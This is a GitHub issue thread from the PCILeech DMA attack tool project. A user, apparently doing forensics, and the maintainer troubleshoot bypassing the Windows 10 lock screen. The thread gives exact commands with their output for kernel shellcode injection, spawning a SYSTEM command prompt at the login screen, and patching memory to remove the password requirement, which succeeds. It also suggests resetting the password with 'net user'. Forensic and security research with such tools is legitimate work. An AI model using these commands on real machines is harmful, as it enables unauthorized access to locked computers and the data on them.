ufrisk / pcileech

Direct Memory Access (DMA) Attack Software
GNU Affero General Public License v3.0

Unable to unlock Windows 10 x64 17763 using AC701/FT601 #150

Closed forense54 closed 4 years ago

forense54 commented 4 years ago

Attacker System: Windows 10 x64 18363 connected to FT601 with USB3.0 cable
Target System: Windows 10 x64 17763 connected to AC701 using PCIe 4x

PCILeech version: PCILeech_files_and_binaries_v4.5-20200804-2 AC701 flashed with prebuilt 4.5 fd1982b1e8e2da48b0fa75ffb196eb41ac45c13dbb25f7547bb084c4c152f4f7 (4.6 does not connect to PCIe, the LED GPIOs do not blink)

The shellcode injection and the wx64_pscmd work correctly in the login screen:

C:\Users\user\Desktop\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe -device fpga:// wx64_pscmd -kmd WIN10_X64_2

KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET!
Automatically spawn a CMD.EXE on the target system. This utility
only work if the target system is locked and the login screen is
visible. If it takes time waiting - then please touch any key on
the target system.   If the utility fails multiple times, please
try wx64_pscreate instead.
DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT
NTSTATUS        : 0x00000000
ADDITIONAL INFO : 0x0000
Microsoft Windows [Versión 10.0.17763.1]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.

C:\WINDOWS\system32>

But, both ways to unlock Windows are not working:

C:\Users\user\Desktop\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe -device fpga:// kmdload -kmd WIN10_X64_2

KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x7fffc000

C:\Users\user\Desktop\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe -device fpga:// wx64_unlock -kmd 0x7fffc000 -0 1

EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

WINDOWS UNLOCKER - REMOVE PASSWORD REQUIREMENT!
REQUIRED OPTIONS:
  -0   : Set to one (1) in order to unlock.
         Example: '-0 1'.
 RESULT AFTER UNLOCK ATTEMPT (0=SUCCESS) 
NTSTATUS        : **0x80004005**

C:\Users\user\Desktop\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe -device fpga:// patch -kmd 0x7fffc000 -pt -sig unlock_win10x64

 Current Action: Patching
 Access Mode:    KMD (kernel module assisted DMA)
 Progress:       17375 / 17376 (99%)
 Speed:          31 MB/s
 Address:        0x000000043DFFF000
 Pages read:     4161334 / 4448256 (93%)
 Pages failed:   286921 (6%)
Patch: Failed. No signature found.

Has anyone found this issue? Thanks

ufrisk commented 4 years ago

The issue is that the signatures I use to search for the location to patch have changed and need to be updated.

I plan to look into this later in September. Please understand that PCILeech is a hobby project of mine. Not many people are sponsoring here on Github and I receive absolutely zero from hardware sales. As such, the time I'm able to put into the project is a bit limited - hence the currently outdated signatures.

Meanwhile, as a workaround you may do in the system shell: net user <username> <new_password> - but that will change the password of the user, unfortunately. I'll update this issue once I have released new signatures.

forense54 commented 4 years ago

Thank you for your answer and your work @ufrisk! I'll look forward to the signatures update.

ufrisk commented 4 years ago

I did a major refresh of the windows unlock signatures just now. Can you please check if the latest release package resolves your issue?

forense54 commented 4 years ago

Thanks for the update! Unfortunately, the issue persists.

Using compiled pcileech from master (using Visual Studio 2019 in Release/x64 mode and MemProcFS and LeechCore from master branch) the kmd load is not working:

C:\Users\User\Desktop\pcileech-master\pcileech-master\files>pcileech.exe --device fpga:// wx64_unlock -kmd WIN10_X64_2 -0 1

Device Info: FPGA: Bad PCIe TLP received! Should not happen!
KMD: Failed locating function hook pointer.
PCILEECH: Failed to load kernel module.

C:\Users\User\Desktop\pcileech-master\pcileech-master\files>pcileech.exe --device fpga:// wx64_unlock -kmd WIN10_X64 -0 1

KMD: Failed. Failed finding entry point.
PCILEECH: Failed to load kernel module.

C:\Users\User\Desktop\pcileech-master\pcileech-master\files>pcileech.exe --device fpga:// kmdload -kmd WIN10_X64

KMD: Failed. Failed finding entry point.
PCILEECH: Failed to load kernel module.

I tried replacing unlock_win10x64.sig and wx64_unlock.ksh from the master compiled version into the prebuilt version and I'm still getting the error code "0x80004005":

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.5-20200804\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe --device fpga:// wx64_pscmd -kmd WIN10_X64_2

Device Info: FPGA: Bad PCIe TLP received! Should not happen!
Device Info: FPGA: Bad PCIe TLP received! Should not happen!
KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET!
================================================================
Automatically spawn a CMD.EXE on the target system. This utility
only work if the target system is locked and the login screen is
visible. If it takes time waiting - then please touch any key on
the target system.   If the utility fails multiple times, please
try wx64_pscreate instead.
===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======
NTSTATUS        : 0x00000000
ADDITIONAL INFO : 0x0000
================================================================
Microsoft Windows [Versión 10.0.17763.1]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.

C:\WINDOWS\system32>

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.5-20200804\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe --device fpga:// wx64_unlock -kmd WIN10_X64_2 -0 1

Device Info: FPGA: Bad PCIe TLP received! Should not happen!
KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

WINDOWS UNLOCKER - REMOVE PASSWORD REQUIREMENT!
===============================================================
REQUIRED OPTIONS:
  -0   : Set to one (1) in order to unlock.
         Example: '-0 1'.
===== RESULT AFTER UNLOCK ATTEMPT (0=SUCCESS) =================
NTSTATUS        : 0x80004005
===============================================================

KMD: Hopefully unloaded.

ufrisk commented 4 years ago

I updated the PCILeech release yesterday. You would need to download the new binaries for it to work. I see you use the old binaries.

The new ones with the new signature are named: PCILeech_files_and_binaries_v4.6-20200830.zip. If this is still not working due to the NTSTATUS : 0x80004005, can you please check whether the version number of c:\windows\system32\ntlmshared.dll differs from the one in the screenshot? If it does, can you please share it with me?

image

Also, you may try the patch command - i.e.: pcileech.exe patch -sig unlock_win10x64 -all (no kernel module required)

forense54 commented 4 years ago

Thanks again @ufrisk !

The patch method unlocks the PC, so the new signatures are working:

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.6-20200830>pcileech patch -sig unlock_win10x64 -all

 Current Action: Patching
 Access Mode:    Normal
 Progress:       17376 / 17376 (100%)
 Speed:          139 MB/s
 Address:        0x000000043E000000
 Pages read:     4177568 / 4448256 (93%)
 Pages failed:   270688 (6%)
Patch: Successful. Location: 0x40c117749

But this new version cannot load kernel modules (same behavior as the master compiled version from yesterday, as reported in #151, but in this case the target device is W10 X64 17763):

image

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.6-20200830>pcileech.exe wx64_unlock -kmd WIN10_X64 -0 1

KMD: Failed locating function hook pointer.
PCILEECH: Failed to load kernel module.

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.6-20200830>pcileech.exe wx64_unlock -kmd WIN10_X64_2 -0 1

KMD: Failed. Failed finding entry point.
PCILEECH: Failed to load kernel module.

ufrisk commented 4 years ago

Thanks, I now see I messed up the kernel inject in the last update. I'll release a new version and fix this later this week. Will let you know when it's done.

ufrisk commented 4 years ago

Published a tiny bug fix. Is the pcileech.exe -device fpga:// kmdload -kmd WIN10_X64_2 command working better now?

forense54 commented 4 years ago

Yes, it works perfectly. Thanks a lot!

ufrisk commented 4 years ago

Awesome! Thank you for reporting and also confirming it now works. Please let me know if you should run into anything more in the future. Since the issue is resolved I'm closing it.

Also, if you should find PCILeech / MemProcFS useful, please consider sponsoring the project here on Github. I see people purchasing hardware for hundreds of dollars (of which I receive absolutely zero dollars) just to be able to run my free open source software. Sponsorships go for as little as $2 and Github is matching it - a $2 sponsorship for you is a $4 sponsorship for me. Thank You 💖